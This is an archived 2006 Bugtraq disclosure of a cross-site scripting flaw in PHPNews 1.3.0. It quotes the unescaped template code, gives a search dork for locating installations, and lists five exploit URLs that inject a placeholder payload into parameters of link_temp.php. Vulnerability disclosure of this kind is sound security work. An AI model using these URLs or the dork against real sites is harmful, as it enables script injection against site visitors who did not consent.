lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
Order Openwall GNU/*/Linux 2.0 on a CD with delivery worldwide
[<prev] [next>] [month] [year] [list] 
Date: 1 Dec 2006 20:57:10 -0000
From: emulamex@...mail.com
To: bugtraq@...urityfocus.com
Subject: PHPNews 1.3.0 XSS

PHP Script: PHPNews 1.3.0
Class: XSS
Website: http://newsphp.sourceforge.net
Found by: Detefix
dork: inurl:phpnews

-----

- Vulnerable Code:

<?php
print<<<EOT
<a href="$url?action=fullnews&amp;showcomments=1&amp;id=$id">$subject</a> by $username on $time<br />

-----

- Exploits:

http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux